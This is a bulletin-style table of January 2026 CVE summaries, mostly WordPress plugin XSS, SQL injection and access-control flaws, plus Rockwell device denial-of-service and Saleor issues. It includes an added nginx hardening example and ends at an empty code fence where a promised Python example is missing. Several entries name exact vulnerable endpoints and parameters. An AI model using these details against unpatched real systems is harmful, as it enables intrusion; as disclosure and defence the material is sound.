| Python Software Foundation--CPython | The email module, specifically the "BytesGenerator" class, didn't properly quote newlines for email headers when serializing an email message, allowing for header injection when an email is serialized. This is only applicable if using "LiteralHeader" to write headers that don't respect email folding rules; the new behavior will reject the incorrectly folded headers in "BytesGenerator". | 2026-01-23 | not yet calculated | CVE-2026-1299 | https://github.com/python/cpython/pull/144126 https://github.com/python/cpython/issues/144125 https://cve.org/CVERecord?id=CVE-2024-6923 https://mail.python.org/archives/list/security-announce@python.org/thread/6ZZULGALJTITEAGEXLDJE2C6FORDXPBT/ https://github.com/python/cpython/commit/052e55e7d44718fe46cbba0ca995cb8fcc359413 |
| Python--Protobuf | A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages. Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python's recursion stack and causing a RecursionError. | 2026-01-23 | not yet calculated | CVE-2026-0994 | https://github.com/protocolbuffers/protobuf/pull/25239 |
| QantumThemes--Kentha Elementor Widgets | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in QantumThemes Kentha Elementor Widgets kentha-elementor allows PHP Local File Inclusion. This issue affects Kentha Elementor Widgets: from n/a through < 3.1. | 2026-01-22 | not yet calculated | CVE-2026-24390 | https://patchstack.com/database/Wordpress/Plugin/kentha-elementor/vulnerability/wordpress-kentha-elementor-widgets-plugin-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| QantumThemes--KenthaRadio | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS. This issue affects KenthaRadio: from n/a through <= 2.2.0. | 2026-01-22 | not yet calculated | CVE-2025-69003 | https://patchstack.com/database/Wordpress/Theme/qt-kentharadio/vulnerability/wordpress-kentharadio-theme-2-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| QOS.CH Sarl--Logback-core | Arbitrary code execution (ACE) vulnerability in configuration file processing in QOS.CH logback-core up to and including version 1.5.24 in Java applications allows an attacker to instantiate classes already present on the class path by compromising an existing logback configuration file. Instantiating a potentially malicious Java class requires that the class be present on the user's class path, and the attacker must have write access to a configuration file. After successful instantiation, the instance is very likely to be discarded without further use. | 2026-01-22 | not yet calculated | CVE-2026-1225 | https://logback.qos.ch/news.html#1.5.25 |
| Raptive--Raptive Ads | Missing Authorization vulnerability in Raptive Raptive Ads adthrive-ads allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Raptive Ads: from n/a through <= 3.10.0. | 2026-01-23 | not yet calculated | CVE-2026-24602 | https://patchstack.com/database/Wordpress/Plugin/adthrive-ads/vulnerability/wordpress-raptive-ads-plugin-3-10-0-broken-access-control-vulnerability?_s_id=cve |
| Rasedul Haque Rumi--BD Courier Order Ratio Checker | Missing Authorization vulnerability in Rasedul Haque Rumi BD Courier Order Ratio Checker bd-courier-order-ratio-checker allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BD Courier Order Ratio Checker: from n/a through <= 2.0.1. | 2026-01-22 | not yet calculated | CVE-2026-22481 | https://patchstack.com/database/Wordpress/Plugin/bd-courier-order-ratio-checker/vulnerability/wordpress-bd-courier-order-ratio-checker-plugin-2-0-1-broken-access-control-vulnerability?_s_id=cve |
| RealMag777--TableOn | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn posts-table-filterable allows Reflected XSS. This issue affects TableOn: from n/a through <= 1.0.4.2. | 2026-01-22 | not yet calculated | CVE-2025-69316 | https://patchstack.com/database/Wordpress/Plugin/posts-table-filterable/vulnerability/wordpress-tableon-plugin-1-0-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Remi Corson--Easy Theme Options | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Remi Corson Easy Theme Options easy-theme-options allows Reflected XSS. This issue affects Easy Theme Options: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2025-68839 | https://patchstack.com/database/Wordpress/Plugin/easy-theme-options/vulnerability/wordpress-easy-theme-options-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| renatoatshown--Shown Connector | Missing Authorization vulnerability in renatoatshown Shown Connector shown-connector allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Shown Connector: from n/a through <= 1.2.10. | 2026-01-22 | not yet calculated | CVE-2025-68003 | https://patchstack.com/database/Wordpress/Plugin/shown-connector/vulnerability/wordpress-shown-connector-plugin-1-2-10-settings-change-vulnerability?_s_id=cve |
| Revive--Revive Adserver | HackerOne community member Faraz Ahmed (PakCyberbot) has reported a format string injection in the Revive Adserver settings. When specific character combinations are used in a setting, the admin user console could be disabled due to a fatal PHP error. | 2026-01-20 | not yet calculated | CVE-2026-21640 | https://hackerone.com/reports/3445332 |
| Revive--Revive Adserver | HackerOne community member Jad Ghamloush (0xjad) has reported an authorization bypass vulnerability in the `tracker-delete.php` script of Revive Adserver. Users with permissions to delete trackers are mistakenly allowed to delete trackers owned by other accounts. | 2026-01-20 | not yet calculated | CVE-2026-21641 | https://hackerone.com/reports/3445710 |
| Revive--Revive Adserver | HackerOne community member Patrick Lang (7yr) has reported a reflected XSS vulnerability in the `banner-acl.php` and `channel-acl.php` scripts of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged-in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed. | 2026-01-20 | not yet calculated | CVE-2026-21642 | https://hackerone.com/reports/3470970 |
| Revive--Revive Adserver | HackerOne community member Patrick Lang (7yr) has reported a reflected XSS vulnerability in the banner-acl.php script of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged-in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed. | 2026-01-20 | not yet calculated | CVE-2026-21663 | https://hackerone.com/reports/3473696 |
| Revive--Revive Adserver | HackerOne community member Huynh Pham Thanh Luc (nigh7c0r3) has reported a reflected XSS vulnerability in the afr.php delivery script of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged-in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed. | 2026-01-20 | not yet calculated | CVE-2026-21664 | https://hackerone.com/reports/3468169 |
| richardevcom--Add Polylang support for Customizer | Cross-Site Request Forgery (CSRF) vulnerability in richardevcom Add Polylang support for Customizer add-polylang-support-for-customizer allows Cross Site Request Forgery. This issue affects Add Polylang support for Customizer: from n/a through <= 1.4.5. | 2026-01-22 | not yet calculated | CVE-2026-22462 | https://patchstack.com/database/Wordpress/Plugin/add-polylang-support-for-customizer/vulnerability/wordpress-add-polylang-support-for-customizer-plugin-1-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Riftzilla--QRGen | Reflected Cross-Site Scripting (XSS) vulnerability in Riftzilla's QRGen. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL using the 'id' parameter in '/article.php'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2026-01-20 | not yet calculated | CVE-2025-40644 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-qrgens-riftzilla |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. After running a Burp Suite active scan, the device loses ICMP connectivity, causing the web application to become inaccessible. | 2026-01-20 | not yet calculated | CVE-2025-9278 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles EtherNet/IP Step Limit Storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9279 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. Fuzzing performed using Defensics causes the device to become unresponsive, requiring a reboot. | 2026-01-20 | not yet calculated | CVE-2025-9280 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive step limit storm tests, the device reboots. | 2026-01-20 | not yet calculated | CVE-2025-9281 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive limited storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9282 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles EtherNet/IP Step Limits Storms tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9283 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. This vulnerability is triggered during fuzzing of multiple CIP classes, which causes the CIP port to become unresponsive. | 2026-01-20 | not yet calculated | CVE-2025-9464 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive grammar tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9465 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles EtherNet/IP and CIP grammar tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9466 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--CompactLogix 5370 | A denial-of-service security issue exists in the affected product. The security issue occurs when a malformed CIP forward open message is sent. This could result in a major nonrecoverable fault; a restart is required to recover. | 2026-01-20 | not yet calculated | CVE-2025-11743 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1770.html |
| Rockwell Automation--ControlLogix Redundancy Enhanced Module | Multiple denial-of-service vulnerabilities exist in the affected product. These issues can be triggered through various crafted inputs, including malformed Class 3 messages, memory leak conditions, and other resource exhaustion scenarios. Exploitation may cause the device to become unresponsive and, in some cases, result in a major nonrecoverable fault. Recovery may require a restart. | 2026-01-20 | not yet calculated | CVE-2025-14027 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1769.html |
| Rockwell Automation--Verve Asset Manager | A security issue was discovered within the legacy ADI server component of Verve Asset Manager, caused by plaintext secrets stored in environment variables on the ADI server. This component has been retired and has been optional since the 1.36 release in 2024. | 2026-01-20 | not yet calculated | CVE-2025-14376 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1767.html |
| Rockwell Automation--Verve Asset Manager | A security issue was discovered within the legacy Ansible playbook component of Verve Asset Manager, caused by plaintext secrets incorrectly stored when a playbook is running. This component has been retired and has been optional since the 1.36 release in 2024. | 2026-01-20 | not yet calculated | CVE-2025-14377 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1767.html |
| Roxnor--GetGenie | Missing Authorization vulnerability in Roxnor GetGenie getgenie allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GetGenie: from n/a through <= 4.3.0. | 2026-01-22 | not yet calculated | CVE-2026-24356 | https://patchstack.com/database/Wordpress/Plugin/getgenie/vulnerability/wordpress-getgenie-plugin-4-3-0-broken-access-control-vulnerability?_s_id=cve |
| Ruijie Networks Co., Ltd.--AP180(JA) V1.xx | AP180 series with firmware versions prior to AP_RGOS 11.9(4)B1P8 contains an OS command injection vulnerability. If this vulnerability is exploited, arbitrary commands may be executed on the devices. | 2026-01-22 | not yet calculated | CVE-2026-23699 | https://www.ruijie.co.jp/products/rg-ap180-pe_p432111650928590848.html#productDocument https://jvn.jp/en/jp/JVN86850670/ |
| RuoYi--RuoYi | Incorrect access control in the update function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily modify data outside of their scope. | 2026-01-23 | not yet calculated | CVE-2025-70985 | https://github.com/yangzongzhuan/RuoYi https://gitee.com/y_project/RuoYi https://gitee.com/y_project/RuoYi/issues/IDIDK2 https://gist.github.com/old6ma/1a2dada02656ba9a4730c85f6c765f4f |
| RuoYi--RuoYi | Incorrect access control in the selectDept function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily access sensitive department data. | 2026-01-23 | not yet calculated | CVE-2025-70986 | https://github.com/yangzongzhuan/RuoYi https://gitee.com/y_project/RuoYi https://gitee.com/y_project/RuoYi/issues/IDIDME https://gist.github.com/old6ma/779320a98f361c299ca024521cb72db6 |
| Rustaurius--Ultimate Reviews | Authorization Bypass Through User-Controlled Key vulnerability in Rustaurius Ultimate Reviews ultimate-reviews allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ultimate Reviews: from n/a through <= 3.2.16. | 2026-01-23 | not yet calculated | CVE-2026-24634 | https://patchstack.com/database/Wordpress/Plugin/ultimate-reviews/vulnerability/wordpress-ultimate-reviews-plugin-3-2-16-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Ryviu--Ryviu – Product Reviews for WooCommerce | Missing Authorization vulnerability in Ryviu Ryviu – Product Reviews for WooCommerce ryviu allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ryviu – Product Reviews for WooCommerce: from n/a through <= 3.1.26. | 2026-01-23 | not yet calculated | CVE-2026-24562 | https://patchstack.com/database/Wordpress/Plugin/ryviu/vulnerability/wordpress-ryviu-product-reviews-for-woocommerce-plugin-3-1-26-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--AppExperts | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saad Iqbal AppExperts appexperts allows SQL Injection. This issue affects AppExperts: from n/a through <= 1.4.5. | 2026-01-22 | not yet calculated | CVE-2025-68881 | https://patchstack.com/database/Wordpress/Plugin/appexperts/vulnerability/wordpress-appexperts-plugin-1-4-5-sql-injection-vulnerability?_s_id=cve |
| saeros1984--Neoforum | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in saeros1984 Neoforum neoforum allows Reflected XSS. This issue affects Neoforum: from n/a through <= 1.0. | 2026-01-23 | not yet calculated | CVE-2026-24623 | https://patchstack.com/database/Wordpress/Plugin/neoforum/vulnerability/wordpress-neoforum-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| saeros1984--Neoforum | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in saeros1984 Neoforum neoforum allows Blind SQL Injection. This issue affects Neoforum: from n/a through <= 1.0. | 2026-01-23 | not yet calculated | CVE-2026-24624 | https://patchstack.com/database/Wordpress/Plugin/neoforum/vulnerability/wordpress-neoforum-plugin-1-0-sql-injection-vulnerability?_s_id=cve |
| saleor--saleor | Saleor is an e-commerce platform. Starting in version 3.0.0 and prior to versions 3.20.108, 3.21.43, and 3.22.27, Saleor allowed users to modify rich text fields with HTML without running any backend HTML cleaners, thus allowing malicious actors to perform stored XSS attacks on dashboards and storefronts. Malicious staff members could craft script injections to target other staff members, possibly stealing their access and/or refresh tokens. This issue has been patched in versions 3.22.27, 3.21.43, and 3.20.108. If upgrading straight away is not possible, a possible workaround is to use a client-side cleaner. | 2026-01-21 | not yet calculated | CVE-2026-22849 | https://github.com/saleor/saleor/security/advisories/GHSA-8jcj-r5g2-qrpv https://github.com/saleor/saleor/commit/1085c7813224a0a65f1dac7275cbc3244e23c386 https://github.com/saleor/saleor/commit/676d95dbc7d811610e68f2ea8f9b6652cbd58e9b https://github.com/saleor/saleor/commit/9110eba68c3f73afa1f72b45bd9b1394c752d335 https://github.com/saleor/saleor/commit/b67a0b9d9f243e5d6c2f9c7643d42a54c24c90ee https://github.com/saleor/saleor/commit/bb5f883aeb0f085899a9d4f35d429cf7eb07a11d https://docs.saleor.io/security/#editorjs--html-cleaning |
| saleor--saleor | Saleor is an e-commerce platform. Starting in version 3.0.0 and prior to versions 3.20.108, 3.21.43, and 3.22.27, Saleor allowed authenticated staff users or Apps to upload arbitrary files, including malicious HTML and SVG files containing JavaScript. Depending on the deployment strategy, these files may be served from the same domain as the dashboard without any restrictions, leading to the execution of malicious scripts in the context of the user's browser. Malicious staff members could craft script injections to target other staff members, possibly stealing their access and/or refresh tokens. Users are vulnerable if they host the media files inside the same domain as the dashboard, e.g., the dashboard is at `example.com/dashboard/` and media are under `example.com/media/`. They are not impacted if media files are hosted on a different domain, e.g., `media.example.com`. Users are impacted if they do not return a `Content-Disposition: attachment` header for the media files. Saleor Cloud users are not impacted. This issue has been patched in versions 3.22.27, 3.21.43, and 3.20.108. Some workarounds are available for those unable to upgrade. Configure the servers hosting the media files (e.g., CDN or reverse proxy) to return the `Content-Disposition: attachment` header; this instructs browsers to download the file instead of rendering it. Prevent the servers from returning HTML and SVG files. Set up a `Content-Security-Policy` for media files, such as `Content-Security-Policy: default-src 'none'; base-uri 'none'; frame-ancestors 'none'; form-action 'none';`. | 2026-01-21 | not yet calculated | CVE-2026-23499 | https://github.com/saleor/saleor/security/advisories/GHSA-666h-2p49-pg95 https://github.com/saleor/saleor/commit/77f7927a0db9a216440df92c51012136f13e1d99 https://github.com/saleor/saleor/commit/7d33efc7a06252320cd51cbb20c2e308aed2fd10 https://github.com/saleor/saleor/commit/9110eba68c3f73afa1f72b45bd9b1394c752d335 https://github.com/saleor/saleor/commit/ac6936a336289c77398ef600cad3498ad4ba261c https://github.com/saleor/saleor/commit/b3cb27b3fe96dae3c879063e56d32a9398eabd24 https://docs.saleor.io/security/#restricted-file-uploads |
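The three workarounds in the Saleor entry above (force download, refuse active content types, pin a restrictive CSP on media responses) map directly onto a reverse-proxy configuration. The fragment below is an added example, not Saleor's documentation or a configuration it ships; the `/media/` prefix and the `/srv/saleor/media/` directory are assumptions for illustration. The two `location /media/` blocks are alternatives: the first is the weak default, the second the hardened replacement; use only one.

```nginx
# Added example, not Saleor's own configuration. Assumes media uploads are
# served under /media/ on the same host as the dashboard.

# Weak: files are served as-is, so an uploaded .html or .svg renders inline
# inside the dashboard's origin and any script it carries runs there.
location /media/ {
    alias /srv/saleor/media/;
}

# Hardened replacement for the block above: force download, stop MIME
# sniffing, pin a CSP that allows nothing, and refuse active content types
# outright. "always" keeps the headers on error responses too.
location /media/ {
    alias /srv/saleor/media/;
    add_header Content-Disposition "attachment" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header Content-Security-Policy "default-src 'none'; base-uri 'none'; frame-ancestors 'none'; form-action 'none';" always;

    location ~* \.(html?|xhtml|svg|svgz|xml)$ {
        return 403;
    }
}
```

Moving media to its own origin (`media.example.com`), as the advisory notes, removes the same-origin exposure entirely; the headers above are the mitigation for deployments that cannot do that immediately.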
| saleor--saleor | Saleor is an e-commerce platform. Versions 3.2.0 through 3.20.109, 3.21.0-a.0 through 3.21.44 and 3.22.0-a.0 through 3.22.28 have an Insecure Direct Object Reference (IDOR) vulnerability that allows unauthenticated actors to extract sensitive information in plain text. Orders created before Saleor 3.2.0 could have PII exfiltrated. The issue has been patched in Saleor versions 3.22.29, 3.21.45, and 3.20.110. As a workaround, temporarily block non-staff users from fetching order information (the order() GraphQL query) using a WAF. | 2026-01-23 | not yet calculated | CVE-2026-24136 | https://github.com/saleor/saleor/security/advisories/GHSA-r6fj-f4r9-36gr https://github.com/saleor/saleor/commit/5dab1857fbb2801f74e2bfe86f307e4590d9d2fa https://github.com/saleor/saleor/commit/718ce1b4fc3aef68eeac1aea0cf1d70a614ba6af https://github.com/saleor/saleor/commit/9bcd4f9000b189297eeb3ac88cc28c6c30229153 https://github.com/saleor/saleor/commit/aeaced8acb5e01055eddec584263f77e517d5944 |
| Salesforce--Marketing Cloud Engagement | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (MicrositeUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22582 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Salesforce--Marketing Cloud Engagement | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (CloudPagesUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22583 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Salesforce--Marketing Cloud Engagement | Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22585 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Salesforce--Marketing Cloud Engagement | Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagement: before January 21st, 2026. | 2026-01-24 | not yet calculated | CVE-2026-22586 | https://help.salesforce.com/s/articleView?id=005299346&type=1 |
| Scalenut--Scalenut | Missing Authorization vulnerability in Scalenut Scalenut scalenut allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Scalenut: from n/a through <= 1.1.3. | 2026-01-22 | not yet calculated | CVE-2025-68882 | https://patchstack.com/database/Wordpress/Plugin/scalenut/vulnerability/wordpress-scalenut-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve |
| scriptsbundle--AdForest | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in scriptsbundle AdForest adforest allows PHP Local File Inclusion. This issue affects AdForest: from n/a through <= 6.0.11. | 2026-01-22 | not yet calculated | CVE-2025-67946 | https://patchstack.com/database/Wordpress/Theme/adforest/vulnerability/wordpress-adforest-theme-6-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| scriptsbundle--AdForest Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle AdForest Elementor adforest-elementor allows Reflected XSS. This issue affects AdForest Elementor: from n/a through <= 3.0.11. | 2026-01-22 | not yet calculated | CVE-2025-67947 | https://patchstack.com/database/Wordpress/Plugin/adforest-elementor/vulnerability/wordpress-adforest-elementor-plugin-3-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve |
| scriptsbundle--CarSpot | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle CarSpot carspot allows Reflected XSS. This issue affects CarSpot: from n/a through < 2.4.6. | 2026-01-22 | not yet calculated | CVE-2025-69317 | https://patchstack.com/database/Wordpress/Theme/carspot/vulnerability/wordpress-carspot-theme-2-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SeaTheme--BM Content Builder | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in SeaTheme BM Content Builder bm-builder allows Path Traversal. This issue affects BM Content Builder: from n/a through <= 3.16.3. | 2026-01-22 | not yet calculated | CVE-2025-69055 | https://patchstack.com/database/Wordpress/Plugin/bm-builder/vulnerability/wordpress-bm-content-builder-plugin-3-16-3-arbitrary-file-download-vulnerability?_s_id=cve |
| Select-Themes--Don Peppe | Missing Authorization vulnerability in Select-Themes Don Peppe donpeppe allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Don Peppe: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22450 | https://patchstack.com/database/Wordpress/Theme/donpeppe/vulnerability/wordpress-don-peppe-theme-1-3-broken-access-control-vulnerability?_s_id=cve |
| Select-Themes--Prowess | Missing Authorization vulnerability in Select-Themes Prowess prowess allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Prowess: from n/a through <= 1.8.1. | 2026-01-22 | not yet calculated | CVE-2026-22447 | https://patchstack.com/database/Wordpress/Theme/prowess/vulnerability/wordpress-prowess-theme-1-8-1-broken-access-control-vulnerability?_s_id=cve |
| Select-Themes--Prowess | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Prowess prowess allows PHP Local File Inclusion. This issue affects Prowess: from n/a through <= 2.3. | 2026-01-23 | not yet calculated | CVE-2026-24531 | https://patchstack.com/database/Wordpress/Theme/prowess/vulnerability/wordpress-prowess-theme-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| SEOSEON EUROPE S.L--Affiliate Link Tracker | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SEOSEON EUROPE S.L Affiliate Link Tracker affiliate-link-tracker allows Stored XSS. This issue affects Affiliate Link Tracker: from n/a through <= 0.2. | 2026-01-22 | not yet calculated | CVE-2025-62077 | https://patchstack.com/database/Wordpress/Plugin/affiliate-link-tracker/vulnerability/wordpress-affiliate-link-tracker-plugin-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Sergiy Dzysyak--Suggestion Toolkit | Missing Authorization vulnerability in Sergiy Dzysyak Suggestion Toolkit suggestion-toolkit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Suggestion Toolkit: from n/a through <= 5.0. | 2026-01-23 | not yet calculated | CVE-2026-24622 | https://patchstack.com/database/Wordpress/Plugin/suggestion-toolkit/vulnerability/wordpress-suggestion-toolkit-plugin-5-0-broken-access-control-vulnerability?_s_id=cve |
| SESAME LABS, S.L--Sesame | Stored Cross-Site Scripting (XSS) vulnerability in Sesame web application, due to the fact that uploaded SVG images are not properly sanitized. This allows attackers to embed malicious scripts in SVG files by sending a POST request using the 'logo' parameter in '/api/v3/companies/<ID>/logo', which are then stored on the server and executed in the context of any user who accesses the compromised resource. | 2026-01-20 | not yet calculated | CVE-2025-41084 | https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-sesame-web-application |
| Shahjahan Jewel--FluentForm | Improper Control of Generation of Code ('Code Injection') vulnerability in Shahjahan Jewel FluentForm fluentform allows Code Injection. This issue affects FluentForm: from n/a through <= 6.1.11. | 2026-01-22 | not yet calculated | CVE-2025-69001 | https://patchstack.com/database/Wordpress/Plugin/fluentform/vulnerability/wordpress-fluentform-plugin-6-1-11-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| sheepfish--WebP Conversion | Missing Authorization vulnerability in sheepfish WebP Conversion webp-conversion allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WebP Conversion: from n/a through <= 2.1. | 2026-01-23 | not yet calculated | CVE-2026-24530 | https://patchstack.com/database/Wordpress/Plugin/webp-conversion/vulnerability/wordpress-webp-conversion-plugin-2-1-broken-access-control-vulnerability?_s_id=cve |
| shinetheme--Traveler | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection. This issue affects Traveler: from n/a through < 3.2.8. | 2026-01-22 | not yet calculated | CVE-2026-24367 | https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-8-sql-injection-vulnerability?_s_id=cve |
| shoutoutglobal--ShoutOut | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in shoutoutglobal ShoutOut shoutout allows Reflected XSS. This issue affects ShoutOut: from n/a through <= 4.0.2. | 2026-01-22 | not yet calculated | CVE-2025-68894 | https://patchstack.com/database/Wordpress/Plugin/shoutout/vulnerability/wordpress-shoutout-plugin-4-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SiteLock--SiteLock Security | Missing Authorization vulnerability in SiteLock SiteLock Security sitelock allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SiteLock Security: from n/a through <= 5.0.2. | 2026-01-23 | not yet calculated | CVE-2026-24532 | https://patchstack.com/database/Wordpress/Plugin/sitelock/vulnerability/wordpress-sitelock-security-plugin-5-0-2-broken-access-control-vulnerability?_s_id=cve |
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. Versions prior to 3.5.4 are vulnerable to reflected cross-site scripting in /api/icon/getDynamicIcon due to unsanitized SVG input. The endpoint generates SVG images for text icons (type=8). The content query parameter is inserted directly into the SVG <text> tag without XML escaping. Since the response Content-Type is image/svg+xml, injecting unescaped tags allows breaking the XML structure and executing JavaScript. Version 3.5.4 patches the issue. | 2026-01-19 | not yet calculated | CVE-2026-23847 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-w836-5gpm-7r93 https://github.com/siyuan-note/siyuan/issues/16844 https://github.com/siyuan-note/siyuan/commit/5c0cc375b47567e15edd2119066b09bb0aa18777 |
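Two SVG-related entries above describe the two sides of the same problem: the Sesame entry (CVE-2025-41084) is script smuggled into an SVG that the server stores and later serves, and the SiYuan entry (CVE-2026-23847) is a server building an SVG by interpolating user text into a `<text>` element. The example below is added here and is not Sesame's or SiYuan's code (SiYuan is written in Go; this is a Python illustration). It shows a reject-list scanner for uploaded SVG that parses the document and refuses script-bearing elements, `on*` handlers and `javascript:`/`data:` links, and a text-icon generator in a vulnerable and an XML-escaped form. All SVG inputs are constructed.

```python
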